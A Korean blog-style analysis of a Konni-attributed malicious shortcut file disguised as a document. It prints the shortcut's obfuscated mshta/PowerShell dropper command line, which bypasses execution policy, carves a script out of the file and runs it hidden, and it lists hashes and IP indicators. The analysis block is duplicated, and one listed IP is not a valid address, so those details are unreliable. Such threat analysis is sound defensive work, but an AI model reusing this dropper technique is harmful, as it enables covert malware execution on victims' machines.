북한 해킹 그룹 Konni(코니)에서 만든 악성코드-ECRM.M.hwp.lnk(<-가칭,2025.3.24)
Contents
오늘은 북한 해킹 그룹 Konni(코니)에서 만든 악성코드에서 만든 악성코드 ECRM.M.M.hwp.lnk(<-가칭,2025.3.24)에 대해 글을 적어보겠습니다. 일단 저번에 알아본 ECRM.M.M.hwp.lnk 하고 비슷합니다.
파일명:ECRM.M.M.hwp.lnk
사이즈:1 MB
MD5:6da06e1e7b9e8e5eb9f199b0fbcf811a
SHA-1:6ae124c02d58737ba8b74e1f2da6b45ea369f1df
SHA-256:6fb3dfe451b37b0304a42e62759bf3670d5b4dd0232621dac0739061fa4704e2
악성코드 에 포함된 코드
StringData
{
namestring: not present
relativepath: ..\..\..\Windows\System32\mshta(.)exe
workingdir: not present
commandlinearguments: javascript:a="pow"(+)"ershell -ep bypa"(+)"ss ";g="c:\\p
ro"(+)"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"| select -Ski
p 0x(0)8e4)) -Force";s="a=new Ac"+"tiveXObject('WSc"(+)"ript.Shell');a.Run(c,0
,true);close();";c=a(+)"-c $t=0x17cb;$k = Get-(C)hildItem *.lnk | where-object
{$_.length -eq $t} | Select-Ob(j)ect -ExpandProperty Name;if($k.co"+"unt -eq 0
){$k=G"+"et-ChildItem $env:TEMP\\*\\*.l"+"nk | where-(o)bject{$_.length -eq $t
};};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"3246 0;"+a+"-f $w;";eval(s);
iconlocation: .xls
}
코드 분석
Windows의 정식 시스템 파일인 mshta.exe를 악용하여 JavaScript를 실행하고 PowerShell 명령어를 생성 및 실행하도록 설계
mshta.exe 는 Windows에 기본 포함된 도구로 HTML 애플리케이션(HTA) 을 실행하는 데 사용
1. 명령어 디코딩 및 분석
전체 PowerShell 명령어 문자열(c)을 구성
PowerShell의 실행 정책을 우회 어떤 스크립트든지 실행할 수 있도록 설정
보안 기능 우회(BYPASS) 목적
.lnk 파일 (바로가기 파일)을 탐색
크기가 정확히 0x17cb (10진수 6091바이트) 인 파일만 필터링
2. TEMP 폴더에서도 탐색
현재 디렉토리에서 못 찾으면 사용자 TEMP 폴더 내 모든 서브 디렉터리를 탐색
3..lnk 파일을 바이트로 읽어서 페이로드 추출
.lnk 파일을 바이트 단위로 읽어들여서 처음 0x8e4 바이트(10진수 2,276바이트)를 건너뛰고 나머지 …
파일명:ECRM.M.M.hwp.lnk
사이즈:1 MB
MD5:6da06e1e7b9e8e5eb9f199b0fbcf811a
SHA-1:6ae124c02d58737ba8b74e1f2da6b45ea369f1df
SHA-256:6fb3dfe451b37b0304a42e62759bf3670d5b4dd0232621dac0739061fa4704e2
악성코드 에 포함된 코드
StringData
{
namestring: not present
relativepath: ..\..\..\Windows\System32\mshta(.)exe
workingdir: not present
commandlinearguments: javascript:a="pow"(+)"ershell -ep bypa"(+)"ss ";g="c:\\p
ro"(+)"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"| select -Ski
p 0x(0)8e4)) -Force";s="a=new Ac"+"tiveXObject('WSc"(+)"ript.Shell');a.Run(c,0
,true);close();";c=a(+)"-c $t=0x17cb;$k = Get-(C)hildItem *.lnk | where-object
{$_.length -eq $t} | Select-Ob(j)ect -ExpandProperty Name;if($k.co"+"unt -eq 0
){$k=G"+"et-ChildItem $env:TEMP\\*\\*.l"+"nk | where-(o)bject{$_.length -eq $t
};};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"3246 0;"+a+"-f $w;";eval(s);
iconlocation: .xls
}
코드 분석
Windows의 정식 시스템 파일인 mshta.exe를 악용하여 JavaScript를 실행하고 PowerShell 명령어를 생성 및 실행하도록 설계
mshta.exe 는 Windows에 기본 포함된 도구로 HTML 애플리케이션(HTA) 을 실행하는 데 사용
1. 명령어 디코딩 및 분석
전체 PowerShell 명령어 문자열(c)을 구성
PowerShell의 실행 정책을 우회 어떤 스크립트든지 실행할 수 있도록 설정
보안 기능 우회(BYPASS) 목적
.lnk 파일 (바로가기 파일)을 탐색
크기가 정확히 0x17cb (10진수 6091바이트) 인 파일만 필터링
2. TEMP 폴더에서도 탐색
현재 디렉토리에서 못 찾으면 사용자 TEMP 폴더 내 모든 서브 디렉터리를 탐색
3..lnk 파일을 바이트로 읽어서 페이로드 추출
.lnk 파일을 바이트 단위로 읽어들여서 처음 0x8e4 바이트(10진수 2,276바이트)를 건너뛰고 나머지 …
IoC
http://841.95.02.46
http://46.20.95.148
6ae124c02d58737ba8b74e1f2da6b45ea369f1df
6da06e1e7b9e8e5eb9f199b0fbcf811a
6fb3dfe451b37b0304a42e62759bf3670d5b4dd0232621dac0739061fa4704e2
http://46.20.95.148
6ae124c02d58737ba8b74e1f2da6b45ea369f1df
6da06e1e7b9e8e5eb9f199b0fbcf811a
6fb3dfe451b37b0304a42e62759bf3670d5b4dd0232621dac0739061fa4704e2